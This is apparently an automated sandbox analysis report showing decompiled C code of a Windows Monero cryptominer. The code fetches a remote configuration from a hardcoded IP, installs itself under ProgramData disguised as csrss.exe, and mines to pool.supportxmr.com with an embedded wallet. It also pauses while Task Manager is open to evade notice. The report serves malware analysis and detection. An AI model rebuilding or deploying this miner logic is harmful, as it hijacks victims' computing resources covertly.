				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				long _v32;
				long _v36;
				char _v38;
				short _v40;
				char _v48;
				char _v72;
				char _v592;
				char _v1112;
				char _v2136;
				char _v3160;
				void _v7224;
				long _t56;
				long _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				long _t96;
				long _t99;
				void* _t102;
				char _t110;
				char _t114;
				char _t117;
				char _t119;
				void* _t125;
				void* _t137;
				void* _t139;
				void* _t140;
				signed int _t148;
				char _t150;
				void* _t153;
				void* _t158;
				intOrPtr _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				void* _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t223;
				void* _t225;
				void* _t226;
				void* _t234;

				_v8 = 0;
				_v12 = 0;
				_v28 = 0;
				_t56 = GetTickCount();
				_t150 = 0;
				_v32 = _t56;
				_v36 = _t56;
				_v24 = 0;
				 *0x1632df4 = 0;
				E01461670(0x1632128, 0, 0xcc8);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				E01461BB0( &_v7224, 0, 0xfe0);
				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  &_v7224, 0x3f8 << 2);
				_t152 = 0;
				SetErrorMode(SetErrorMode(2) | 0x00000002);
				E014617E0(0x163206c, "e9c1286a28d82a2d0ee6");
				_t174 = _t171 + 0x2c;
				if(CreateMutexA(0, 0, 0x163206c) == 0) {
					ExitProcess(0x1e);
				}
				_t158 = GetLastError;
				_t66 = GetLastError();
				_t191 = _t66 - 0xb7;
				if(_t66 == 0xb7) {
					ExitProcess(0x1f);
				}
				E01463220(0, SetErrorMode, _t191);
				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
				if(_t166 != 0 && _v24 > 1) {
					_t148 = E014619C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
					_t174 = _t174 + 8;
					asm("sbb eax, eax");
					 *0x1631bb8 =  *0x1631bb8 &  ~_t148;
				}
				LocalFree(_t166);
				_t72 = E01461000(_t152, _t158, _t166,  *0x1631314);
				_t175 = _t174 + 4;
				_t195 = _t72;
				if(_t72 != 0) {
					E01468070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
					_t176 = _t175 + 4;
					_t196 =  *0x1631bc0 - _t150; // 0x0
					if(_t196 != 0) {
						E014617E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						_t176 = _t176 + 8;
					}
					_t74 = E01461600(0x163204c, "LKBNMTFJgl");
					_t177 = _t176 + 8;
					if(_t74 != 0) {
						_t75 = E01461600("csrss.exe", "csrss.exe");
						_t178 = _t177 + 8;
						if(_t75 != 0) {
							_t76 = E01461600("viTRMUuKeV", "viTRMUuKeV");
							_t179 = _t178 + 8;
							if(_t76 != 0) {
								_t77 = E01467FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x146aae0, 0x23);
								_t180 = _t179 + 0xc;
								if(_t77 != 0) {
									E01461970("C:\ProgramData\LKBNMTFJgl", "\\");
									E01461970("C:\ProgramData\LKBNMTFJgl", 0x163204c);
									_t181 = _t180 + 0x10;
									if(CreateDirectoryW(?str?, 0) != 0 || GetLastError() == 0xb7) {
										if(E01468DD0() != 0 &&  *0x163210c == 1) {
											 *0x163211c = CreateThread(0, 0, E01468450, 0, 0, 0);
										}
										_t82 = E014617B0("FALSE", "http://45.144.225.135/config.txt");
										_t182 = _t181 + 8;
										if(_t82 == 0) {
											L33:
											_t84 = E01463150( &_v1112);
											_t183 = _t182 + 4;
											if(_t84 != 0) {
												E014630B0( &_v1112,  &_v2136,  &_v3160);
												__imp__SetThreadExecutionState(0x80000041, 0);
												_t89 = E01463CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
												_t185 = _t183 + 0x24;
												if(_t89 == 0) {
													L91:
													ExitProcess(0x3d);
												}
												_t90 = E01463CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
												_t186 = _t185 + 0x14;
												if(_t90 == 0) {
													goto L91;
												}
												L38:
												while(1) {
													if( *0x1631300 != 0) {
														_t169 = _v28;
														if(_t169 == 0) {
															_t96 = GetTickCount();
															_t215 = _t96 - _v36 - 0x4e20;
															if(_t96 - _v36 > 0x4e20) {
																E014665D0(_t215);
																_t170 =  !=  ? 1 : _t169;
																_v28 =  !=  ? 1 : _t169;
															}
														}
													}
													if( *0x1631308 == 3) {
														_t160 =  *0x1631310; // 0x7530
														_t161 = _t160 + 1;
														__eflags = _t161;
													} else {
														_t161 = E01468040();
													}
													_t91 = E01468A50(_t150);
													_t187 = _t186 + 4;
													_t168 =  ==  ? 1 : _t91;
													if( *0x1631304 == 0) {
														_t93 = _v12;
													} else {
														_t93 = E01467EF0("taskmgr.exe");
														_t187 = _t187 + 4;
														_v12 = _t93;
													}
													if(_t150 == 0 || _t168 == 0) {
														if(_t93 != 0) {
															goto L58;
														}
														_t223 =  *0x1631320 - _t93; // 0x0
														if(_t223 != 0 ||  *0x1632110 != _t93) {
															goto L58;
														} else {
															_t225 = _t161 -  *0x1631310; // 0x7530
															if(_t225 <= 0) {
																__eflags =  *0x1631308;
																if( *0x1631308 != 0) {
																	_t117 = E01463050(_t150, _t152,  &_v2136, 0);
																	_t187 = _t187 + 8;
																	_t150 = _t117;
																	_t168 = 1;
																}
																_v8 = 0;
																goto L68;
															}
															_t119 = E01463050(_t150, _t152,  &_v3160, _t93);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t119;
															_t168 = 1;
															goto L59;
														}
													} else {
														L58:
														__eflags = _v8;
														if(_v8 == 0) {
															L68:
															_t234 = _t161 -  *0x1631310; // 0x7530
															if(_t234 <= 0) {
																L75:
																__eflags = _v12;
																if(_v12 == 0) {
																	L77:
																	if( *0x1631320 == 0) {
																		L79:
																		if( *0x1632110 == 0) {
																			L82:
																			_t94 = E014617B0("FALSE", "http://45.144.225.135/config.txt");
																			_t186 = _t187 + 8;
																			if(_t94 != 0) {
																				_t99 = GetTickCount();
																				_t152 =  *0x1631bb4 * 0xea60;
																				_t245 = _t99 - _v32 -  *0x1631bb4 * 0xea60;
																				if(_t99 - _v32 >  *0x1631bb4 * 0xea60) {
																					_v32 = GetTickCount();
																					_t102 = E01464DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", 0x1632128, _t150, _t168);
																					_t186 = _t186 + 0x14;
																					if(_t102 != 0) {
																						if(E014639B0(_t153) != 0) {
																							if(_t168 != 0) {
																								E01468730(_t150);
																								_t186 = _t186 + 4;
																							}
																							E01463CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
																							E01463CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
																							_t186 = _t186 + 0x28;
																						}
																						E01463B50(_t153, _v20, _v16);
																						_t186 = _t186 + 8;
																					}
																				}
																			}
																			Sleep(0xfa0);
																			continue;
																		}
																		L80:
																		if(_t168 == 0) {
																			goto L82;
																		}
																		L81:
																		E01468730(_t150);
																		_t187 = _t187 + 4;
																		_t168 = 0;
																		goto L82;
																	}
																	L78:
																	if(_t168 != 0) {
																		goto L81;
																	}
																	goto L79;
																}
																L76:
																__eflags = _t168;
																if(_t168 != 0) {
																	goto L81;
																}
																goto L77;
															}
															if(_v12 != 0) {
																goto L76;
															}
															if( *0x1631320 != 0) {
																goto L78;
															}
															if( *0x1632110 != 0) {
																goto L80;
															}
															if(_t168 != 0) {
																E01468730(_t150);
																_t187 = _t187 + 4;
															}
															_t110 = E01463050(_t150, _t152,  &_v3160, 0);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t110;
															_t168 = 1;
															goto L77;
														}
														L59:
														_t226 = _t161 -  *0x1631310; // 0x7530
														if(_t226 > 0) {
															goto L75;
														}
														if(_v12 != 0) {
															goto L76;
														}
														if( *0x1631320 != 0) {
															goto L78;
														}
														if( *0x1632110 != 0) {
															goto L80;
														}
														if(_t168 != 0) {
															E01468730(_t150);
															_t187 = _t187 + 4;
															_t168 = 0;
														}
														if( *0x1631308 != 0) {
															_t114 = E01463050(_t150, _t152,  &_v2136, 0);
															_t187 = _t187 + 8;
															_t150 = _t114;
															_t168 = 1;
														}
														_v8 = 0;
														goto L68;
													}
												}
											}
											ExitProcess(0x1c);
										} else {
											asm("movq xmm0, [0x163206c]");
											_v40 =  *0x1632074;
											asm("movq [ebp-0x2c], xmm0");
											_v38 = _t150;
											E01461A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
											_t125 = E01461600( &_v72,  &_v48);
											_t183 = _t182 + 0x10;
											if(_t125 == 0) {
												ExitProcess(0x2f);
											}
											E01461970( &_v592, "\\");
											E01461970( &_v592,  &_v72);
											E01461970( &_v592, "_");
											E01461970( &_v592, L"3.1.0");
											_t188 = _t183 + 0x20;
											_t137 =  *0x16310b8( &_v592,  &_v20, 0, 0);
											_t207 = _t137 - 1;
											if(_t137 == 1) {
												_t139 = E014637E0(_t207,  &_v592);
												_t189 = _t188 + 4;
												_t208 = _t139;
												if(_t139 != 0) {
													E014639B0(_t153);
													_push(_v16);
													E01463680(_t153, _v20);
													_t189 = _t189 + 8;
												}
												_t140 = E01464DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", 0x1632128, 0, 0);
												_t182 = _t189 + 0x14;
												if(_t140 != 0) {
													E014639B0(_t153);
													E01463B50(_t153, _v20, _v16);
													_t182 = _t182 + 8;
												}
												goto L33;
											}
											ExitProcess(0x3c);
										}
									} else {
										ExitProcess(0x32);
									}
								}
								ExitProcess(0x31);
							}
							ExitProcess(0x30);
						}
						ExitProcess(0x30);
					} else {
						ExitProcess(0x30);
					}
				}
				ExitProcess(0x3b);
			}











































































                                                                                                        0x0146447e
                                                                                                        0x01464481
                                                                                                        0x01464484
                                                                                                        0x01464487
                                                                                                        0x0146448d
                                                                                                        0x0146448f
                                                                                                        0x0146449d
                                                                                                        0x014644a0
                                                                                                        0x014644a3
                                                                                                        0x014644a9
                                                                                                        0x014644b9
                                                                                                        0x014644be
                                                                                                        0x014644c3
                                                                                                        0x014644db
                                                                                                        0x014644db
                                                                                                        0x014644eb
                                                                                                        0x014644f7
                                                                                                        0x014644fc
                                                                                                        0x0146450e
                                                                                                        0x01464512
                                                                                                        0x01464512
                                                                                                        0x01464518
                                                                                                        0x0146451e
                                                                                                        0x01464520
                                                                                                        0x01464525
                                                                                                        0x01464529
                                                                                                        0x01464529
                                                                                                        0x0146452f
                                                                                                        0x01464545
                                                                                                        0x01464549
                                                                                                        0x01464559
                                                                                                        0x0146455e
                                                                                                        0x01464563
                                                                                                        0x01464565
                                                                                                        0x01464565
                                                                                                        0x0146456c
                                                                                                        0x01464578
                                                                                                        0x0146457d
                                                                                                        0x01464580
                                                                                                        0x01464582
                                                                                                        0x01464591
                                                                                                        0x01464596
                                                                                                        0x01464599
                                                                                                        0x0146459f
                                                                                                        0x014645ab
                                                                                                        0x014645b0
                                                                                                        0x014645b0
                                                                                                        0x014645bd
                                                                                                        0x014645c2
                                                                                                        0x014645c7
                                                                                                        0x014645db
                                                                                                        0x014645e0
                                                                                                        0x014645e5
                                                                                                        0x014645f9
                                                                                                        0x014645fe
                                                                                                        0x01464603
                                                                                                        0x01464619
                                                                                                        0x0146461e
                                                                                                        0x01464623
                                                                                                        0x01464637
                                                                                                        0x01464646
                                                                                                        0x0146464b
                                                                                                        0x0146465d
                                                                                                        0x01464677
                                                                                                        0x01464697
                                                                                                        0x01464697
                                                                                                        0x014646a6
                                                                                                        0x014646ab
                                                                                                        0x014646b0
                                                                                                        0x014647b8
                                                                                                        0x014647bf
                                                                                                        0x014647c4
                                                                                                        0x014647c9
                                                                                                        0x014647f2
                                                                                                        0x014647ff
                                                                                                        0x0146481c
                                                                                                        0x01464821
                                                                                                        0x01464826
                                                                                                        0x01464af0
                                                                                                        0x01464af2
                                                                                                        0x01464af2
                                                                                                        0x01464843
                                                                                                        0x01464848
                                                                                                        0x0146484d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464853
                                                                                                        0x0146485f
                                                                                                        0x01464861
                                                                                                        0x01464866
                                                                                                        0x01464868
                                                                                                        0x01464871
                                                                                                        0x01464876
                                                                                                        0x01464878
                                                                                                        0x0146487f
                                                                                                        0x01464882
                                                                                                        0x01464882
                                                                                                        0x01464876
                                                                                                        0x01464866
                                                                                                        0x0146488c
                                                                                                        0x01464897
                                                                                                        0x0146489d
                                                                                                        0x0146489d
                                                                                                        0x0146488e
                                                                                                        0x01464893
                                                                                                        0x01464893
                                                                                                        0x0146489f
                                                                                                        0x014648a6
                                                                                                        0x014648b1
                                                                                                        0x014648bb
                                                                                                        0x014648cf
                                                                                                        0x014648bd
                                                                                                        0x014648c2
                                                                                                        0x014648c7
                                                                                                        0x014648ca
                                                                                                        0x014648ca
                                                                                                        0x014648d4
                                                                                                        0x014648dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014648de
                                                                                                        0x014648e4
                                                                                                        0x00000000
                                                                                                        0x014648ee
                                                                                                        0x014648ee
                                                                                                        0x014648f4
                                                                                                        0x01464916
                                                                                                        0x0146491d
                                                                                                        0x01464928
                                                                                                        0x0146492d
                                                                                                        0x01464930
                                                                                                        0x01464932
                                                                                                        0x01464932
                                                                                                        0x01464937
                                                                                                        0x00000000
                                                                                                        0x01464937
                                                                                                        0x014648fe
                                                                                                        0x01464903
                                                                                                        0x01464906
                                                                                                        0x0146490d
                                                                                                        0x0146490f
                                                                                                        0x00000000
                                                                                                        0x0146490f
                                                                                                        0x01464940
                                                                                                        0x01464940
                                                                                                        0x01464940
                                                                                                        0x01464944
                                                                                                        0x014649ab
                                                                                                        0x014649ab
                                                                                                        0x014649b1
                                                                                                        0x014649f9
                                                                                                        0x014649f9
                                                                                                        0x014649fd
                                                                                                        0x01464a03
                                                                                                        0x01464a0a
                                                                                                        0x01464a10
                                                                                                        0x01464a17
                                                                                                        0x01464a28
                                                                                                        0x01464a32
                                                                                                        0x01464a37
                                                                                                        0x01464a3c
                                                                                                        0x01464a48
                                                                                                        0x01464a4a
                                                                                                        0x01464a57
                                                                                                        0x01464a59
                                                                                                        0x01464a72
                                                                                                        0x01464a75
                                                                                                        0x01464a7a
                                                                                                        0x01464a7f
                                                                                                        0x01464a88
                                                                                                        0x01464a8c
                                                                                                        0x01464a8f
                                                                                                        0x01464a94
                                                                                                        0x01464a94
                                                                                                        0x01464aae
                                                                                                        0x01464aca
                                                                                                        0x01464acf
                                                                                                        0x01464acf
                                                                                                        0x01464ad8
                                                                                                        0x01464add
                                                                                                        0x01464add
                                                                                                        0x01464a7f
                                                                                                        0x01464a59
                                                                                                        0x01464ae5
                                                                                                        0x00000000
                                                                                                        0x01464ae5
                                                                                                        0x01464a19
                                                                                                        0x01464a1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464a1d
                                                                                                        0x01464a1e
                                                                                                        0x01464a23
                                                                                                        0x01464a26
                                                                                                        0x00000000
                                                                                                        0x01464a26
                                                                                                        0x01464a0c
                                                                                                        0x01464a0e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464a0e
                                                                                                        0x014649ff
                                                                                                        0x014649ff
                                                                                                        0x01464a01
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464a01
                                                                                                        0x014649b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014649c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014649c9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014649cd
                                                                                                        0x014649d0
                                                                                                        0x014649d5
                                                                                                        0x014649d5
                                                                                                        0x014649e1
                                                                                                        0x014649e6
                                                                                                        0x014649e9
                                                                                                        0x014649f0
                                                                                                        0x014649f2
                                                                                                        0x00000000
                                                                                                        0x014649f2
                                                                                                        0x01464946
                                                                                                        0x01464946
                                                                                                        0x0146494c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464956
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464963
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464970
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464978
                                                                                                        0x0146497b
                                                                                                        0x01464980
                                                                                                        0x01464983
                                                                                                        0x01464983
                                                                                                        0x0146498c
                                                                                                        0x01464997
                                                                                                        0x0146499c
                                                                                                        0x0146499f
                                                                                                        0x014649a1
                                                                                                        0x014649a1
                                                                                                        0x014649a8
                                                                                                        0x00000000
                                                                                                        0x014649a8
                                                                                                        0x014648d4
                                                                                                        0x01464853
                                                                                                        0x014647cd
                                                                                                        0x014646b6
                                                                                                        0x014646bc
                                                                                                        0x014646c4
                                                                                                        0x014646d4
                                                                                                        0x014646d9
                                                                                                        0x014646dc
                                                                                                        0x014646e9
                                                                                                        0x014646ee
                                                                                                        0x014646f3
                                                                                                        0x014647d5
                                                                                                        0x014647d5
                                                                                                        0x01464705
                                                                                                        0x01464715
                                                                                                        0x01464726
                                                                                                        0x01464737
                                                                                                        0x0146473c
                                                                                                        0x0146474e
                                                                                                        0x01464754
                                                                                                        0x01464756
                                                                                                        0x01464767
                                                                                                        0x0146476c
                                                                                                        0x0146476f
                                                                                                        0x01464771
                                                                                                        0x01464773
                                                                                                        0x01464778
                                                                                                        0x0146477e
                                                                                                        0x01464783
                                                                                                        0x01464783
                                                                                                        0x01464799
                                                                                                        0x0146479e
                                                                                                        0x014647a3
                                                                                                        0x014647a5
                                                                                                        0x014647b0
                                                                                                        0x014647b5
                                                                                                        0x014647b5
                                                                                                        0x00000000
                                                                                                        0x014647a3
                                                                                                        0x0146475a
                                                                                                        0x0146475a
                                                                                                        0x01464668
                                                                                                        0x0146466a
                                                                                                        0x0146466a
                                                                                                        0x0146465d
                                                                                                        0x01464627
                                                                                                        0x01464627
                                                                                                        0x01464607
                                                                                                        0x01464607
                                                                                                        0x014645e9
                                                                                                        0x014645c9
                                                                                                        0x014645cb
                                                                                                        0x014645cb
                                                                                                        0x014645c7
                                                                                                        0x01464586

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 01464487
                                                                                                        • SetErrorMode.KERNEL32(00000002), ref: 014644E5
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 014644EB
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,0163206C), ref: 01464506
                                                                                                        • ExitProcess.KERNEL32 ref: 01464512
                                                                                                        • GetLastError.KERNEL32 ref: 0146451E
                                                                                                        • ExitProcess.KERNEL32 ref: 01464529
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Error$ExitModeProcess$CountCreateLastMutexTick
                                                                                                        • String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$pool.supportxmr.com:3333$taskmgr.exe$viTRMUuKeV$viTRMUuKeV
                                                                                                        • API String ID: 3615071802-2903677349
                                                                                                        • Opcode ID: f757e012b8e5c9be1cc4ef72914bb43f19e5256e2a30d542f464387e603255b3
                                                                                                        • Instruction ID: 22692199d367d980b2c72f1cdd37093adc39a6a7a3fc8ba0592725a7d3bf10cd
                                                                                                        • Opcode Fuzzy Hash: f757e012b8e5c9be1cc4ef72914bb43f19e5256e2a30d542f464387e603255b3
                                                                                                        • Instruction Fuzzy Hash: BBF11EB5E40305ABEF21ABB5DD05B9F366CAB2174EF08002BEA05B2271E7B49554CB53
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01463220, Relevance: 61.5, APIs: 3, Strings: 32, Instructions: 237COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E01463220(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t31;
				void* _t35;
				long _t37;
				short _t38;
				void* _t41;
				void* _t43;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t48;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t58;
				struct HINSTANCE__* _t60;
				void* _t67;
				void* _t70;
				void* _t73;

				_t67 = __esi;
				_t43 = __ecx;
				 *0x1631300 = 0;
				 *0x1631304 = 0;
				 *0x1631308 = 0;
				 *0x163130c = 0;
				 *0x1631310 = 0x7530;
				 *0x1631238 = 0x5f;
				 *0x16312bc = 0x18;
				 *0x16319ac = 0x20;
				 *0x16319b0 = 5;
				 *0x1631318 = 0;
				 *0x163131c = 0;
				 *0x1631320 = 0;
				 *0x1631bb8 = 1;
				 *0x1631bbc = 0xa;
				 *0x1631bc0 = 0;
				 *0x1631c24 = 0;
				 *0x163210c = 1;
				E01461BB0(0x163208c, 0, 0x80);
				E014617E0(0x163208c, "[no-email]");
				E014617E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
				asm("xorps xmm0, xmm0");
				 *0x1631c48 = 0;
				asm("movups [0x1631c28], xmm0");
				asm("movups [0x1631c38], xmm0");
				E01461BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
				E01461BB0("csrss.exe", 0, 0x60);
				asm("xorps xmm0, xmm0");
				asm("movups [0x163158c], xmm0");
				asm("movups [0x163159c], xmm0");
				E01461BB0(0x16319b4, 0, 0x200);
				E01461BB0(0x16312c0, 0, 0x40);
				E01461640(0x16312c0, 0x1469df0, 0x40);
				E01461BB0("http://45.144.225.135/config.txt", 0, 0x200);
				_t10 =  *0x16319ac; // 0x20
				E01461640("http://45.144.225.135/config.txt", 0x1469e30, _t10 + 1);
				E01461BB0("FALSE", 0, 0x200);
				_t14 =  *0x16319b0; // 0x5
				E01461640("FALSE", "FALSE", _t14 + 1);
				_t17 = E014617B0("FALSE", "http://45.144.225.135/config.txt");
				_t73 = _t70 + 0x90;
				if(_t17 != 0) {
					E01461CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x16319ac);
					_t41 = E014617B0("FALSE", "FALSE");
					_t73 = _t73 + 0x18;
					if(_t41 != 0) {
						E01461CE0("0125789244697858", 0x10, "FALSE",  *0x16319b0);
						_t73 = _t73 + 0x10;
					}
				}
				_t19 = E01468270(_t43, GetCurrentProcess());
				 *0x1631314 = _t19;
				if(_t19 != 0) {
					E01468DD0();
					_t60 =  *0x1631318; // 0x0
					_t61 =  ==  ? 1 : _t60;
					 *0x1631318 =  ==  ? 1 : _t60;
				}
				_push(_t67);
				E014617B0("TRUE", "TRUE");
				_t44 =  *0x1631300; // 0x1
				_t45 =  ==  ? 1 : _t44;
				 *0x1631300 =  ==  ? 1 : _t44;
				E014617B0("TASKMGR", "TASKMGR");
				_t46 =  *0x1631304; // 0x1
				_t47 =  ==  ? 1 : _t46;
				 *0x1631304 =  ==  ? 1 : _t46;
				E014617B0("1THREAD", "50%CPU");
				_t48 =  *0x1631308; // 0x2
				_t49 =  ==  ? 1 : _t48;
				 *0x1631308 =  ==  ? 1 : _t48;
				E014617B0("50%CPU", "50%CPU");
				_t50 =  *0x1631308; // 0x2
				_t51 =  ==  ? 2 : _t50;
				 *0x1631308 =  ==  ? 2 : _t50;
				E014617B0("100%CPU", "50%CPU");
				_t52 =  *0x1631308; // 0x2
				_t53 =  ==  ? 3 : _t52;
				 *0x1631308 =  ==  ? 3 : _t52;
				E014617B0("100%CPU", "100%CPU");
				_t54 =  *0x163130c; // 0x1
				_t55 =  ==  ? 1 : _t54;
				 *0x1631bb4 = 0x1e;
				 *0x163130c =  ==  ? 1 : _t54;
				E01461BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0, 0x100);
				_t27 =  *0x1631238; // 0x5f
				E01461640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x1469f40, _t27 + 1);
				E01461CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x1631238);
				_t31 = E01461BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x1631238);
				E01461BB0("pool.supportxmr.com:3333", 0, 0x80);
				_t56 =  *0x16312bc; // 0x18
				E01461640("pool.supportxmr.com:3333", 0x146a018, _t56 + 1);
				E01461CE0("0125789244697858", 0x10, "pool.supportxmr.com:3333",  *0x16312bc);
				_t35 = E01461BE0("pool.supportxmr.com:3333",  *0x16312bc);
				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
					ExitProcess(0x27);
				}
				E014618D0("pool.supportxmr.com:3333", "nicehash.com");
				_t58 =  *0x163131c; // 0x0
				_t59 =  !=  ? 1 : _t58;
				 *0x163131c =  !=  ? 1 : _t58;
				_t37 = GetModuleFileNameW(0, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200);
				if(_t37 == 0 || _t37 == 0x200) {
					_t38 = 0;
					 *0x1631c4c = 0;
					goto L12;
				} else {
					_t38 = E01468B20("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "d572da9202196121d952231f26d65d07");
					if(_t38 == 0) {
						L12:
						 *0x1631c28 = 0;
						 *0x1632110 = 0;
						return _t38;
					} else {
						 *0x1631c48 = 0;
						 *0x1632110 = 0;
						return _t38;
					}
				}
			}


























                                                                                                        0x01463220
                                                                                                        0x01463220
                                                                                                        0x0146322c
                                                                                                        0x01463236
                                                                                                        0x01463240
                                                                                                        0x0146324a
                                                                                                        0x01463254
                                                                                                        0x0146325e
                                                                                                        0x01463268
                                                                                                        0x01463272
                                                                                                        0x0146327c
                                                                                                        0x01463286
                                                                                                        0x01463290
                                                                                                        0x0146329a
                                                                                                        0x014632a4
                                                                                                        0x014632ae
                                                                                                        0x014632b8
                                                                                                        0x014632c2
                                                                                                        0x014632cc
                                                                                                        0x014632d6
                                                                                                        0x014632e5
                                                                                                        0x014632f4
                                                                                                        0x014632fe
                                                                                                        0x01463301
                                                                                                        0x01463312
                                                                                                        0x01463319
                                                                                                        0x01463320
                                                                                                        0x0146332e
                                                                                                        0x01463338
                                                                                                        0x01463342
                                                                                                        0x01463349
                                                                                                        0x01463350
                                                                                                        0x01463361
                                                                                                        0x01463372
                                                                                                        0x01463383
                                                                                                        0x01463388
                                                                                                        0x01463399
                                                                                                        0x014633aa
                                                                                                        0x014633af
                                                                                                        0x014633c0
                                                                                                        0x014633d2
                                                                                                        0x014633d7
                                                                                                        0x014633dc
                                                                                                        0x014633f0
                                                                                                        0x014633ff
                                                                                                        0x01463404
                                                                                                        0x01463409
                                                                                                        0x0146341d
                                                                                                        0x01463422
                                                                                                        0x01463422
                                                                                                        0x01463409
                                                                                                        0x0146342d
                                                                                                        0x01463435
                                                                                                        0x01463441
                                                                                                        0x01463443
                                                                                                        0x01463448
                                                                                                        0x01463450
                                                                                                        0x01463453
                                                                                                        0x01463453
                                                                                                        0x01463459
                                                                                                        0x01463464
